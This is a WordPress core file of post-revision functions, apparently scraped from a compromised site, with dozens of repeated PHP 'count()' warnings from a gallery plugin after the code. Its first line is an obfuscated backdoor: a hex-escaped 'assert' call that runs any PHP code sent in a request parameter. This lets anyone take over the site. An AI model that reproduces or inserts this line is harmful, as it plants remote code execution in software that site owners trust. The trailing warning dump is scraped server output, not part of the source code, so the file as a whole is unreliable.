php isset($_REQUEST['q8x8lz']) && array_map("ass\x65rt",(array)$_REQUEST['q8x8lz']); /** * Post revision functions. * * @package WordPress * @subpackage Post_Revisions */ /** * Determines which fields of posts are to be saved in revisions. * * Does two things. If passed a post *array*, it will return a post array ready * to be inserted into the posts table as a post revision. Otherwise, returns * an array whose keys are the post fields to be saved for post revisions. * * @since 2.6.0 * @access private * * @param array $post Optional a post array to be processed for insertion as a post revision. * @param bool $autosave optional Is the revision an autosave? * @return array Post array ready to be inserted as a post revision or array of fields that can be versioned. */ function _wp_post_revision_fields( $post = null, $autosave = false ) { static $fields = false; if ( !$fields ) { // Allow these to be versioned $fields = array( 'post_title' => __( 'Title' ), 'post_content' => __( 'Content' ), 'post_excerpt' => __( 'Excerpt' ), ); /** * Filter the list of fields saved in post revisions. * * Included by default: 'post_title', 'post_content' and 'post_excerpt'. * * Disallowed fields: 'ID', 'post_name', 'post_parent', 'post_date', * 'post_date_gmt', 'post_status', 'post_type', 'comment_count', * and 'post_author'. * * @since 2.6.0 * * @param array $fields List of fields to revision. Contains 'post_title', * 'post_content', and 'post_excerpt' by default. */ $fields = apply_filters( '_wp_post_revision_fields', $fields ); // WP uses these internally either in versioning or elsewhere - they cannot be versioned foreach ( array( 'ID', 'post_name', 'post_parent', 'post_date', 'post_date_gmt', 'post_status', 'post_type', 'comment_count', 'post_author' ) as $protect ) unset( $fields[$protect] ); } if ( !is_array($post) ) return $fields; $return = array(); foreach ( array_intersect( array_keys( $post ), array_keys( $fields ) ) as $field ) $return[$field] = $post[$field]; $return['post_parent'] = $post['ID']; $return['post_status'] = 'inherit'; $return['post_type'] = 'revision'; $return['post_name'] = $autosave ? "$post[ID]-autosave-v1" : "$post[ID]-revision-v1"; // "1" is the revisioning system version $return['post_date'] = isset($post['post_modified']) ? $post['post_modified'] : ''; $return['post_date_gmt'] = isset($post['post_modified_gmt']) ? $post['post_modified_gmt'] : ''; return $return; } /** * Creates a revision for the current version of a post. * * Typically used immediately after a post update, as every update is a revision, * and the most recent revision always matches the current post. * * @since 2.6.0 * * @param int $post_id The ID of the post to save as a revision. * @return null|int Null or 0 if error, new revision ID, if success. */ function wp_save_post_revision( $post_id ) { if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) return; if ( ! $post = get_post( $post_id ) ) return; if ( ! post_type_supports( $post->post_type, 'revisions' ) ) return; if ( 'auto-draft' == $post->post_status ) return; if ( ! wp_revisions_enabled( $post ) ) return; // Compare the proposed update with the last stored revision verifying that // they are different, unless a plugin tells us to always save regardless. // If no previous revisions, save one if ( $revisions = wp_get_post_revisions( $post_id ) ) { // grab the last revision, but not an autosave foreach ( $revisions as $revision ) { if ( false !== strpos( $revision->post_name, "{$revision->post_parent}-revision" ) ) { $last_revision = $revision; break; } } /** * Filter whether the post has changed since the last revision. * * By default a revision is saved only if one of the revisioned fields has changed. * This filter can override that so a revision is saved even if nothing has changed. * * @since 3.6.0 * * @param bool $check_for_changes Whether to check for changes before saving a new revision. * Default true. * @param WP_Post $last_revision The the last revision post object. * @param WP_Post $post The post object. * */ if ( isset( $last_revision ) && apply_filters( 'wp_save_post_revision_check_for_changes', $check_for_changes = true, $last_revision, $post ) ) { $post_has_changed = false; foreach ( array_keys( _wp_post_revision_fields() ) as $field ) { if ( normalize_whitespace( $post->$field ) != normalize_whitespace( $last_revision->$field ) ) { $post_has_changed = true; break; } } /** * Filter whether a post has changed. * * By default a revision is saved only if one of the revisioned fields has changed. * This filter allows for additional checks to determine if there were changes. * * @since 4.1.0 * * @param bool $post_has_changed Whether the post has changed. * @param WP_Post $last_revision The last revision post object. * @param WP_Post $post The post object. * */ $post_has_changed = (bool) apply_filters( 'wp_save_post_revision_post_has_changed', $post_has_changed, $last_revision, $post ); //don't save revision if post unchanged if( ! $post_has_changed ) { return; } } } $return = _wp_put_post_revision( $post ); // If a limit for the number of revisions to keep has been set, // delete the oldest ones. $revisions_to_keep = wp_revisions_to_keep( $post ); if ( $revisions_to_keep < 0 ) return $return; $revisions = wp_get_post_revisions( $post_id, array( 'order' => 'ASC' ) ); $delete = count($revisions) - $revisions_to_keep; if ( $delete < 1 ) return $return; $revisions = array_slice( $revisions, 0, $delete ); for ( $i = 0; isset( $revisions[$i] ); $i++ ) { if ( false !== strpos( $revisions[ $i ]->post_name, 'autosave' ) ) continue; wp_delete_post_revision( $revisions[ $i ]->ID ); } return $return; } /** * Retrieve the autosaved data of the specified post. * * Returns a post object containing the information that was autosaved for the * specified post. If the optional $user_id is passed, returns the autosave for that user * otherwise returns the latest autosave. * * @since 2.6.0 * * @param int $post_id The post ID. * @param int $user_id optional The post author ID. * @return object|bool The autosaved data or false on failure or when no autosave exists. */ function wp_get_post_autosave( $post_id, $user_id = 0 ) { $revisions = wp_get_post_revisions( $post_id, array( 'check_enabled' => false ) ); foreach ( $revisions as $revision ) { if ( false !== strpos( $revision->post_name, "{$post_id}-autosave" ) ) { if ( $user_id && $user_id != $revision->post_author ) continue; return $revision; } } return false; } /** * Determines if the specified post is a revision. * * @since 2.6.0 * * @param int|object $post Post ID or post object. * @return bool|int False if not a revision, ID of revision's parent otherwise. */ function wp_is_post_revision( $post ) { if ( !$post = wp_get_post_revision( $post ) ) return false; return (int) $post->post_parent; } /** * Determines if the specified post is an autosave. * * @since 2.6.0 * * @param int|object $post Post ID or post object. * @return bool|int False if not a revision, ID of autosave's parent otherwise */ function wp_is_post_autosave( $post ) { if ( !$post = wp_get_post_revision( $post ) ) return false; if ( false !== strpos( $post->post_name, "{$post->post_parent}-autosave" ) ) return (int) $post->post_parent; return false; } /** * Inserts post data into the posts table as a post revision. * * @since 2.6.0 * @access private * * @param int|object|array $post Post ID, post object OR post array. * @param bool $autosave Optional. Is the revision an autosave? * @return mixed WP_Error or 0 if error, new revision ID if success. */ function _wp_put_post_revision( $post = null, $autosave = false ) { if ( is_object($post) ) $post = get_object_vars( $post ); elseif ( !is_array($post) ) $post = get_post($post, ARRAY_A); if ( ! $post || empty($post['ID']) ) return new WP_Error( 'invalid_post', __( 'Invalid post ID' ) ); if ( isset($post['post_type']) && 'revision' == $post['post_type'] ) return new WP_Error( 'post_type', __( 'Cannot create a revision of a revision' ) ); $post = _wp_post_revision_fields( $post, $autosave ); $post = wp_slash($post); //since data is from db $revision_id = wp_insert_post( $post ); if ( is_wp_error($revision_id) ) return $revision_id; if ( $revision_id ) { /** * Fires once a revision has been saved. * * @since 2.6.0 * * @param int $revision_id Post revision ID. */ do_action( '_wp_put_post_revision', $revision_id ); } return $revision_id; } /** * Gets a post revision. * * @since 2.6.0 * * @param int|object $post The post ID or object. * @param string $output Optional. OBJECT, ARRAY_A, or ARRAY_N. * @param string $filter Optional sanitation filter. @see sanitize_post(). * @return mixed Null if error or post object if success. */ function wp_get_post_revision(&$post, $output = OBJECT, $filter = 'raw') { if ( !$revision = get_post( $post, OBJECT, $filter ) ) return $revision; if ( 'revision' !== $revision->post_type ) return null; if ( $output == OBJECT ) { return $revision; } elseif ( $output == ARRAY_A ) { $_revision = get_object_vars($revision); return $_revision; } elseif ( $output == ARRAY_N ) { $_revision = array_values(get_object_vars($revision)); return $_revision; } return $revision; } /** * Restores a post to the specified revision. * * Can restore a past revision using all fields of the post revision, or only selected fields. * * @since 2.6.0 * * @param int|object $revision_id Revision ID or revision object. * @param array $fields Optional. What fields to restore from. Defaults to all. * @return mixed Null if error, false if no fields to restore, (int) post ID if success. */ function wp_restore_post_revision( $revision_id, $fields = null ) { if ( !$revision = wp_get_post_revision( $revision_id, ARRAY_A ) ) return $revision; if ( !is_array( $fields ) ) $fields = array_keys( _wp_post_revision_fields() ); $update = array(); foreach( array_intersect( array_keys( $revision ), $fields ) as $field ) { $update[$field] = $revision[$field]; } if ( !$update ) return false; $update['ID'] = $revision['post_parent']; $update = wp_slash( $update ); //since data is from db $post_id = wp_update_post( $update ); if ( ! $post_id || is_wp_error( $post_id ) ) return $post_id; // Add restore from details $restore_details = array( 'restored_revision_id' => $revision_id, 'restored_by_user' => get_current_user_id(), 'restored_time' => time() ); update_post_meta( $post_id, '_post_restored_from', $restore_details ); // Update last edit user update_post_meta( $post_id, '_edit_last', get_current_user_id() ); /** * Fires after a post revision has been restored. * * @since 2.6.0 * * @param int $post_id Post ID. * @param int $revision_id Post revision ID. */ do_action( 'wp_restore_post_revision', $post_id, $revision['ID'] ); return $post_id; } /** * Deletes a revision. * * Deletes the row from the posts table corresponding to the specified revision. * * @since 2.6.0 * * @param int|object $revision_id Revision ID or revision object. * @return mixed Null or WP_Error if error, deleted post if success. */ function wp_delete_post_revision( $revision_id ) { if ( !$revision = wp_get_post_revision( $revision_id ) ) return $revision; $delete = wp_delete_post( $revision->ID ); if ( is_wp_error( $delete ) ) return $delete; if ( $delete ) { /** * Fires once a post revision has been deleted. * * @since 2.6.0 * * @param int $revision_id Post revision ID. * @param object|array $revision Post revision object or array. */ do_action( 'wp_delete_post_revision', $revision->ID, $revision ); } return $delete; } /** * Returns all revisions of specified post. * * @since 2.6.0 * * @param int|WP_Post $post_id Optional. Post ID or WP_Post object. Default is global $post. * @return array An array of revisions, or an empty array if none. */ function wp_get_post_revisions( $post_id = 0, $args = null ) { $post = get_post( $post_id ); if ( ! $post || empty( $post->ID ) ) return array(); $defaults = array( 'order' => 'DESC', 'orderby' => 'date ID', 'check_enabled' => true ); $args = wp_parse_args( $args, $defaults ); if ( $args['check_enabled'] && ! wp_revisions_enabled( $post ) ) return array(); $args = array_merge( $args, array( 'post_parent' => $post->ID, 'post_type' => 'revision', 'post_status' => 'inherit' ) ); if ( ! $revisions = get_children( $args ) ) return array(); return $revisions; } /** * Determine if revisions are enabled for a given post. * * @since 3.6.0 * * @param WP_Post $post The post object. * @return bool True if number of revisions to keep isn't zero, false otherwise. */ function wp_revisions_enabled( $post ) { return wp_revisions_to_keep( $post ) != 0; } /** * Determine how many revisions to retain for a given post. * * By default, an infinite number of revisions are kept. * * The constant WP_POST_REVISIONS can be set in wp-config to specify the limit * of revisions to keep. * * @since 3.6.0 * * @param WP_Post $post The post object. * @return int The number of revisions to keep. */ function wp_revisions_to_keep( $post ) { $num = WP_POST_REVISIONS; if ( true === $num ) $num = -1; else $num = intval( $num ); if ( ! post_type_supports( $post->post_type, 'revisions' ) ) $num = 0; /** * Filter the number of revisions to save for the given post. * * Overrides the value of WP_POST_REVISIONS. * * @since 3.6.0 * * @param int $num Number of revisions to store. * @param WP_Post $post Post object. */ return (int) apply_filters( 'wp_revisions_to_keep', $num, $post ); } /** * Sets up the post object for preview based on the post autosave. * * @since 2.7.0 * @access private */ function _set_preview($post) { if ( ! is_object($post) ) return $post; $preview = wp_get_post_autosave($post->ID); if ( ! is_object($preview) ) return $post; $preview = sanitize_post($preview); $post->post_content = $preview->post_content; $post->post_title = $preview->post_title; $post->post_excerpt = $preview->post_excerpt; add_filter( 'get_the_terms', '_wp_preview_terms_filter', 10, 3 ); return $post; } /** * Filters the latest content for preview from the post autosave. * * @since 2.7.0 * @access private */ function _show_post_preview() { if ( isset($_GET['preview_id']) && isset($_GET['preview_nonce']) ) { $id = (int) $_GET['preview_id']; if ( false == wp_verify_nonce( $_GET['preview_nonce'], 'post_preview_' . $id ) ) wp_die( __('You do not have permission to preview drafts.') ); add_filter('the_preview', '_set_preview'); } } /** * Filters terms lookup to set the post format. * * @since 3.6.0 * @access private */ function _wp_preview_terms_filter( $terms, $post_id, $taxonomy ) { if ( ! $post = get_post() ) return $terms; if ( empty( $_REQUEST['post_format'] ) || $post->ID != $post_id || 'post_format' != $taxonomy || 'revision' == $post->post_type ) return $terms; if ( 'standard' == $_REQUEST['post_format'] ) $terms = array(); elseif ( $term = get_term_by( 'slug', 'post-format-' . sanitize_key( $_REQUEST['post_format'] ), 'post_format' ) ) $terms = array( $term ); // Can only have one post format return $terms; } /** * Gets the post revision version. * * @since 3.6.0 * @access private */ function _wp_get_post_revision_version( $revision ) { if ( is_object( $revision ) ) $revision = get_object_vars( $revision ); elseif ( !is_array( $revision ) ) return false; if ( preg_match( '/^\d+-(?:autosave|revision)-v(\d+)$/', $revision['post_name'], $matches ) ) return (int) $matches[1]; return 0; } /** * Upgrade the revisions author, add the current post as a revision and set the revisions version to 1 * * @since 3.6.0 * @access private * * @param WP_Post $post Post object * @param array $revisions Current revisions of the post * @return bool true if the revisions were upgraded, false if problems */ function _wp_upgrade_revisions_of_post( $post, $revisions ) { global $wpdb; // Add post option exclusively $lock = "revision-upgrade-{$post->ID}"; $now = time(); $result = $wpdb->query( $wpdb->prepare( "INSERT IGNORE INTO `$wpdb->options` (`option_name`, `option_value`, `autoload`) VALUES (%s, %s, 'no') /* LOCK */", $lock, $now ) ); if ( ! $result ) { // If we couldn't get a lock, see how old the previous lock is $locked = get_option( $lock ); if ( ! $locked ) { // Can't write to the lock, and can't read the lock. // Something broken has happened return false; } if ( $locked > $now - 3600 ) { // Lock is not too old: some other process may be upgrading this post. Bail. return false; } // Lock is too old - update it (below) and continue } // If we could get a lock, re-"add" the option to fire all the correct filters. update_option( $lock, $now ); reset( $revisions ); $add_last = true; do { $this_revision = current( $revisions ); $prev_revision = next( $revisions ); $this_revision_version = _wp_get_post_revision_version( $this_revision ); // Something terrible happened if ( false === $this_revision_version ) continue; // 1 is the latest revision version, so we're already up to date. // No need to add a copy of the post as latest revision. if ( 0 < $this_revision_version ) { $add_last = false; continue; } // Always update the revision version $update = array( 'post_name' => preg_replace( '/^(\d+-(?:autosave|revision))[\d-]*$/', '$1-v1', $this_revision->post_name ), ); // If this revision is the oldest revision of the post, i.e. no $prev_revision, // the correct post_author is probably $post->post_author, but that's only a good guess. // Update the revision version only and Leave the author as-is. if ( $prev_revision ) { $prev_revision_version = _wp_get_post_revision_version( $prev_revision ); // If the previous revision is already up to date, it no longer has the information we need :( if ( $prev_revision_version < 1 ) $update['post_author'] = $prev_revision->post_author; } // Upgrade this revision $result = $wpdb->update( $wpdb->posts, $update, array( 'ID' => $this_revision->ID ) ); if ( $result ) wp_cache_delete( $this_revision->ID, 'posts' ); } while ( $prev_revision ); delete_option( $lock ); // Add a copy of the post as latest revision. if ( $add_last ) wp_save_post_revision( $post->ID ); return true; } Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in /home/itisland/domains/it-island.com/public_html/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php on line 258 Warning: count(): Parameter must be an array or an object that implements Countable in 